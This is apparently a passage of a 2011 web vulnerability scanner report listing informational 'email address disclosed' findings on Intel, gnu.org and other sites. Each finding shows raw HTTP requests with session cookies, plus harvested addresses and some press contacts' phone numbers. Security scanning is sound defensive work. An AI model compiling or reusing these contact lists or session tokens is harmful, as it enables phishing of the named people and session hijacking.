INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:39 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323032373b31342c323031363b31342c323030343b31342c323031303b31342c323030353b31342c323030363b31342c323030373b31342c323031313b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:42 GMT; Path=/
X-JAL: 573
Content-Language: en-US
CacheHit: D=662753 t=1296947679796756
X-JSL: D=662759 t=1296947679796756
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<a class="jive-link-email-small" href="mailto:alessandra.neris@bm.com">alessandra.neris@bm.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:raquel.vitorino@bm.com">raquel.vitorino@bm.com</a>
...[SNIP]...

19.25. http://newsroom.intel.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /opensearch.xml

Issue detail

The following email address was disclosed in the response:
  • webadmin@intel.com

Request

GET /opensearch.xml HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:39 GMT
Server: Apache
X-JAL: 3
CacheHit: D=32285 t=1296947679913708
X-JSL: D=32291 t=1296947679913708
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Intel Newsroom</ShortName>
<Description>Search Intel Newsroom</Description
...[SNIP]...
<Contact>webadmin@intel.com</Contact>
...[SNIP]...

19.26. http://newsroom.intel.com/recent-updates.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /recent-updates.jspa

Issue detail

The following email address was disclosed in the response:
  • sarah.sexton@intel.com

Request

GET /recent-updates.jspa HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:15:14 GMT
Server: Apache
X-JAL: 101
Content-Language: en-US
CacheHit: D=195551 t=1296947714513336
X-JSL: D=195556 t=1296947714513336
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
l.com"
id="jive-32576,107,542,985,615,812"
onmouseover="quickuserprofile.getUserProfileTooltip(3257);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>sarah.sexton@intel.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/sarah.sexton%40intel.com/avatar/22.png?a=1205"
border="0" height="22" width="22"
alt="sarah.sexton@intel.com"
/>
...[SNIP]...

19.27. http://objectivemarketer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://objectivemarketer.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • info@objectivemarketer.com

Request

GET / HTTP/1.1
Host: objectivemarketer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: User-Agent,Accept,Accept-Encoding
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3cf9af507c272e66cd36478b26071629=sai9qbst3amoinsloek35rc7u2; path=/
Set-Cookie: ja_kyanite_tpl=ja_kyanite; expires=Thu, 26-Jan-2012 23:21:09 GMT; path=/
Last-Modified: Sat, 05 Feb 2011 23:21:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<a href="mailto:info@objectivemarketer.com">info@objectivemarketer.com</a>
...[SNIP]...
<a href="mailto:info@objectivemarketer.com" class="mainlevel-nav" >
...[SNIP]...

19.28. http://rss.intel.com/rss/intel-master-pressfeed.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /rss/intel-master-pressfeed.xml

Issue detail

The following email addresses were disclosed in the response:
  • Katie_Eisenhart@dell.com
  • agnes.ck.kwan@intel.com
  • dave.erskine@amd.com
  • gail.dundas@intel.com
  • heather.mackinnon@bm.com
  • info@myst-technology.com
  • j.lucas@ssi.samsung.com
  • kari.e.aakre@intel.com
  • krisfair@lenovo.com
  • mjkang@lgdisplay.com
  • nick.knupffer@intel.com
  • rbates@societyforscience.org

Request

GET /rss/intel-master-pressfeed.xml HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:33 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Sat, 05 Feb 2011 23:20:38 GMT
ETag: "20b8e1-66fdf-3f18dd80"
Accept-Ranges: bytes
Content-Length: 421855
Vary: Accept-Encoding
Content-Type: application/xml
Set-Cookie: FGTServer=067F652F5A38F27A091593C46969DD9726772316; Version=1; Max-Age=3600

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xml:base="http://mysmartchannels.com/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:itunes="http://www.itunes.com/dtds/p
...[SNIP]...
ress Feed
Copyright .. 2010 Intel Corporation, All Rights Reserved

MyST Enterprise RSS Powered by MySmartChannels... | A Service of MyST Technology Partners, Inc.
http://myst-technology.com or mailto:info@myst-technology.com
-->
...[SNIP]...
ottom:8px; border-left:0px; border-top:0px; border-bottom:0px;"&gt;&lt;p style="margin-left: 0in;"&gt;Gail Dundas, Intel&lt;/div&gt;&lt;div&gt;503-264-2154, &lt;a class="jive-link-custom" href="mailto:gail.dundas@intel.com" target="_blank"&gt;gail.dundas@intel.com&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;p style="margin-left: 0in;"&gt;Rick Bates, Society for Science &amp;amp; the Public&lt;/div&gt;&lt;div&gt;202-872-5136, &lt;a class="jive-link-custom" href="mailto:rbates@societyforscience.org" target="_blank"&gt;rbates@societyforscience.org&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;p style="margin-left: 0in;"&gt;Heather MacKinnon, Burson-Marsteller, for Intel&lt;/div&gt;&lt;div&gt;415-591-4127, &lt;a class="jive-link-custom" href="mailto:heather.mackinnon@bm.com" target="_blank"&gt;heather.mackinnon@bm.com&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;!-- [DocumentBodyEnd:179c1161-5330-40cd-b222-f26786ba8bc5] --&gt;</description>
...[SNIP]...
ight: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p&gt;Dave Erskine&lt;/p&gt;&lt;p&gt;AMD&lt;/p&gt;&lt;p&gt;905-882-2600 ext. 8477&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:dave.erskine@amd.com"&gt;dave.erskine@amd.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p&gt;Katie Eisenhart&lt;/p&gt;&lt;p&gt;Dell&lt;/p&gt;&lt;p&gt;512-728-3812&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:Katie_Eisenhart@dell.com"&gt;Katie_Eisenhart@dell.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p&gt;Nick Knupffer&lt;/p&gt;&lt;p&gt;Intel&lt;/p&gt;&lt;p&gt;408-250-7265&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:nick.knupffer@intel.com"&gt;nick.knupffer@intel.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p&gt;Kristy Fair&lt;/p&gt;&lt;p&gt;Lenovo&lt;/p&gt;&lt;p&gt;919-257-6329&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:krisfair@lenovo.com"&gt;krisfair@lenovo.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p&gt;Jay Kang&lt;/p&gt;&lt;p&gt;LG Display&lt;/p&gt;&lt;p&gt;82-2-3777-1575&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:mjkang@lgdisplay.com"&gt;mjkang@lgdisplay.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p&gt;John Lucas&lt;/p&gt;&lt;p&gt;Samsung Electronics Co., Ltd.&lt;/p&gt;&lt;p&gt;408-544-4363&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:j.lucas@ssi.samsung.com"&gt;j.lucas@ssi.samsung.com&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;!-- [DocumentBodyEnd:6978e936-da44-46df-a193-dcf1824d32a4] --&gt;</description>
...[SNIP]...
tom:8px; border-left:0px; border-top:0px; border-bottom:0px;"&gt;&lt;p style="margin-left: 0in;"&gt;Kari Aakre, Intel Press Relations&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:kari.e.aakre@intel.com"&gt;kari.e.aakre@intel.com&lt;/a&gt;&lt;/p&gt;&lt;p style="min-height: 8pt; height: 8pt; padding: 0px;"&gt;&amp;#160;&lt;/p&gt;&lt;p style="margin-left: 0in;"&gt;Agnes Kwan, Intel Press Relations&lt;/p&gt;&lt;p&gt;&lt;a class="jive-link-email-small" href="mailto:agnes.ck.kwan@intel.com"&gt;agnes.ck.kwan@intel.com&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td style="padding-top:8px; border-right:0px; border-top:0px; border-bottom:0px;" valign="top"&gt;INFORMATION:&lt;/td&gt;&lt;td style="padding-top
...[SNIP]...

19.29. http://sam.zoy.org/wtfpl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sam.zoy.org
Path:   /wtfpl/

Issue detail

The following email addresses were disclosed in the response:
  • sam@hocevar.net
  • sam@zoy.org

Request

GET /wtfpl/ HTTP/1.1
Host: sam.zoy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:12 GMT
Server: Apache/1.3.34 (Debian) PHP/5.2.0-10+lenny1
X-Powered-By: PHP/5.2.6-1+lenny9
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="Content-
...[SNIP]...
<meta name="Author" content="sam@zoy.org (Sam Hocevar)" />
...[SNIP]...
<br />&nbsp;Copyright&nbsp;(C)&nbsp;2004&nbsp;Sam&nbsp;Hocevar&nbsp;&lt;sam@hocevar.net&gt;
<br />
...[SNIP]...

19.30. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Issue detail

The following email address was disclosed in the response:
  • parallelprogrammingtalk@intel.com

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=870d40b73302ba266471c5df270a786b; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<p>As we discussed last week we are looking for interesting tags to sign off with. Submit your ideas to: parallelprogrammingtalk@intel.com</p>
...[SNIP]...

19.31. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Issue detail

The following email address was disclosed in the response:
  • parallelprogrammingtalk@intel.com

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7c7fa33f5e3871a2f2f8ad2e5fc6cc5f; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
yourself hanging by a thread, add some synchronization... and my personal favorite: ...Keep your powder dry and your threads safe... We know there are many more and invite you to submit your ideas to: parallelprogrammingtalk@intel.com</p>
...[SNIP]...

19.32. http://www.gnu.org/licenses/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:
  • gnu@gnu.org
  • web-translators@gnu.org
  • webmasters@gnu.org
  • you@example.com

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:47 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 23:17:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

19.33. http://www.intc.com/events.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /events.cfm

Issue detail

The following email addresses were disclosed in the response:
  • mark.h.henninger@intel.com
  • peter.schuman@intel.com

Request

GET /events.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:49 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:49 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:mark.h.henninger@intel.com">mark.h.henninger@intel.com</a>
...[SNIP]...
<a href="mailto:peter.schuman@intel.com">peter.schuman@intel.com</a>
...[SNIP]...

19.34. http://www.intc.com/faq.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /faq.cfm

Issue detail

The following email address was disclosed in the response:
  • web.queries@computershare.com

Request

GET /faq.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A33%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:33 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:33 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:33 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<br />
web.queries@computershare.com (mailto:link)<br />
...[SNIP]...

19.35. http://www.intc.com/intelAR2009/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /intelAR2009/index.html

Issue detail

The following email address was disclosed in the response:
  • info@zu.com

Request

GET /intelAR2009/index.html HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Content-Length: 4826
Content-Type: text/html
Content-Location: http://www.intc.com/intelAR2009/index.html
Last-Modified: Wed, 07 Apr 2010 20:13:55 GMT
Accept-Ranges: bytes
ETag: "88344ed98ed6ca1:8b2ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:15:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<meta http-equiv="author" content="zu.com communications inc. Saskatoon SK Canada info@zu.com" />
...[SNIP]...

19.36. http://www.intc.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /releasedetail.cfm

Issue detail

The following email address was disclosed in the response:
  • webmaster@shareholder.com

Request

GET /releasedetail.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
